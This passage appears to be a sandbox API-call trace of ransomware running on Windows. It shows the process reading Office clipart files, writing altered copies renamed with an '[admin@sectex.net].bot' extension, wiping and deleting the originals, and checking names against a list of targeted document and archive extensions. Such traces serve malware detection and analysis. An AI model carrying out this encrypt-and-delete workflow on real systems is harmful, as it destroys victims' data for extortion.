	[0147.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.847] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1400) returned 1
	[0147.848] CloseHandle (hObject=0x1b8) returned 1
	[0147.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf")) returned 0x20
	[0147.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.848] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.848] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.849] GetLastError () returned 0x0
	[0147.849] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x578, lpOverlapped=0x0) returned 1
	[0147.850] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x580, lpOverlapped=0x0) returned 1
	[0147.851] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.851] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.851] SetEndOfFile (hFile=0x3d0) returned 1
	[0147.851] CloseHandle (hObject=0x3d0) returned 1
	[0147.851] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.852] SetEndOfFile (hFile=0x1b8) returned 1
	[0147.853] CloseHandle (hObject=0x1b8) returned 1
	[0147.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.854] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf")) returned 1
	[0147.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.854] lstrlenW (lpString=".doc") returned 4
	[0147.854] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.854] lstrlenW (lpString=".docx") returned 5
	[0147.854] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.854] lstrlenW (lpString=".pdf") returned 4
	[0147.855] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString=".xls") returned 4
	[0147.855] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.855] lstrlenW (lpString=".xlsx") returned 5
	[0147.855] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.855] lstrlenW (lpString=".ppt") returned 4
	[0147.855] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString=".zip") returned 4
	[0147.855] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.855] lstrlenW (lpString=".rar") returned 4
	[0147.855] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString=".bz2") returned 4
	[0147.855] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString=".7z") returned 3
	[0147.855] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString=".dbf") returned 4
	[0147.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString=".1cd") returned 4
	[0147.855] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString=".jpg") returned 4
	[0147.855] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.855] lstrlenW (lpString=".doc") returned 4
	[0147.855] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.855] lstrlenW (lpString=".docx") returned 5
	[0147.856] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.856] lstrlenW (lpString=".pdf") returned 4
	[0147.856] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString=".xls") returned 4
	[0147.856] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.856] lstrlenW (lpString=".xlsx") returned 5
	[0147.856] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.856] lstrlenW (lpString=".ppt") returned 4
	[0147.856] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.856] lstrlenW (lpString=".zip") returned 4
	[0147.856] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.856] lstrlenW (lpString=".rar") returned 4
	[0147.856] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString=".bz2") returned 4
	[0147.856] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString=".7z") returned 3
	[0147.856] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.856] lstrlenW (lpString=".dbf") returned 4
	[0147.856] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.856] lstrlenW (lpString=".1cd") returned 4
	[0147.856] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.856] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 63
	[0147.856] lstrlenW (lpString=".jpg") returned 4
	[0147.856] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.856] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.857] lstrlenW (lpString="HH00612_.WMF") returned 12
	[0147.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.858] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12632) returned 1
	[0147.858] CloseHandle (hObject=0x1b8) returned 1
	[0147.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf")) returned 0x20
	[0147.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0147.858] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.858] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0147.860] GetLastError () returned 0x0
	[0147.860] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3158, lpOverlapped=0x0) returned 1
	[0147.864] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3160, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3160, lpOverlapped=0x0) returned 1
	[0147.992] ReadFile (in: hFile=0x1b8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.993] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.998] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.196] CloseHandle (hObject=0x3d0) returned 1
	[0148.196] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.196] SetEndOfFile (hFile=0x1b8) returned 1
	[0148.558] CloseHandle (hObject=0x1b8) returned 1
	[0148.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf")) returned 1
	[0148.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.608] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.610] lstrlenW (lpString=".doc") returned 4
	[0148.610] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.616] lstrlenW (lpString=".docx") returned 5
	[0148.616] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.618] lstrlenW (lpString=".pdf") returned 4
	[0148.619] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.623] lstrlenW (lpString=".xls") returned 4
	[0148.624] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.625] lstrlenW (lpString=".xlsx") returned 5
	[0148.626] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.626] lstrlenW (lpString=".ppt") returned 4
	[0148.627] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString=".zip") returned 4
	[0148.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.629] lstrlenW (lpString=".rar") returned 4
	[0148.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString=".bz2") returned 4
	[0148.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString=".7z") returned 3
	[0148.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString=".dbf") returned 4
	[0148.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString=".1cd") returned 4
	[0148.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString=".jpg") returned 4
	[0148.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.629] lstrlenW (lpString=".doc") returned 4
	[0148.629] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString=".docx") returned 5
	[0148.629] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.629] lstrlenW (lpString=".pdf") returned 4
	[0148.629] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.629] lstrlenW (lpString=".xls") returned 4
	[0148.629] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.630] lstrlenW (lpString=".xlsx") returned 5
	[0148.630] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.630] lstrlenW (lpString=".ppt") returned 4
	[0148.630] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.630] lstrlenW (lpString=".zip") returned 4
	[0148.630] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.630] lstrlenW (lpString=".rar") returned 4
	[0148.630] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.630] lstrlenW (lpString=".bz2") returned 4
	[0148.630] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.630] lstrlenW (lpString=".7z") returned 3
	[0148.630] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.630] lstrlenW (lpString=".dbf") returned 4
	[0148.630] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.630] lstrlenW (lpString=".1cd") returned 4
	[0148.630] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 63
	[0148.630] lstrlenW (lpString=".jpg") returned 4
	[0148.630] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.630] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.630] lstrlenW (lpString="HH01329_.WMF") returned 12
	[0148.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.631] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6016) returned 1
	[0148.631] CloseHandle (hObject=0x3a0) returned 1
	[0148.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf")) returned 0x20
	[0148.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0148.632] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.632] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0148.633] GetLastError () returned 0x0
	[0148.633] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1780, lpOverlapped=0x0) returned 1
	[0148.634] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1790, lpOverlapped=0x0) returned 1
	[0148.635] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.635] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.635] SetEndOfFile (hFile=0x3dc) returned 1
	[0148.635] CloseHandle (hObject=0x3dc) returned 1
	[0148.635] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.636] SetEndOfFile (hFile=0x3a0) returned 1
	[0148.638] CloseHandle (hObject=0x3a0) returned 1
	[0148.638] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.638] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf")) returned 1
	[0148.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString=".doc") returned 4
	[0148.639] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString=".docx") returned 5
	[0148.639] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.639] lstrlenW (lpString=".pdf") returned 4
	[0148.639] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString=".xls") returned 4
	[0148.639] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.639] lstrlenW (lpString=".xlsx") returned 5
	[0148.639] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.639] lstrlenW (lpString=".ppt") returned 4
	[0148.639] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString=".zip") returned 4
	[0148.639] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.639] lstrlenW (lpString=".rar") returned 4
	[0148.639] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString=".bz2") returned 4
	[0148.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString=".7z") returned 3
	[0148.639] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString=".dbf") returned 4
	[0148.639] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString=".1cd") returned 4
	[0148.639] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.639] lstrlenW (lpString=".jpg") returned 4
	[0148.639] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.640] lstrlenW (lpString=".doc") returned 4
	[0148.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString=".docx") returned 5
	[0148.640] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0148.640] lstrlenW (lpString=".pdf") returned 4
	[0148.640] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString=".xls") returned 4
	[0148.640] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0148.640] lstrlenW (lpString=".xlsx") returned 5
	[0148.640] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0148.640] lstrlenW (lpString=".ppt") returned 4
	[0148.640] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.640] lstrlenW (lpString=".zip") returned 4
	[0148.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0148.640] lstrlenW (lpString=".rar") returned 4
	[0148.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString=".bz2") returned 4
	[0148.640] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString=".7z") returned 3
	[0148.640] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.640] lstrlenW (lpString=".dbf") returned 4
	[0148.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.640] lstrlenW (lpString=".1cd") returned 4
	[0148.640] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0148.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 63
	[0148.641] lstrlenW (lpString=".jpg") returned 4
	[0148.641] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0148.641] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0148.641] lstrlenW (lpString="HH01461_.WMF") returned 12
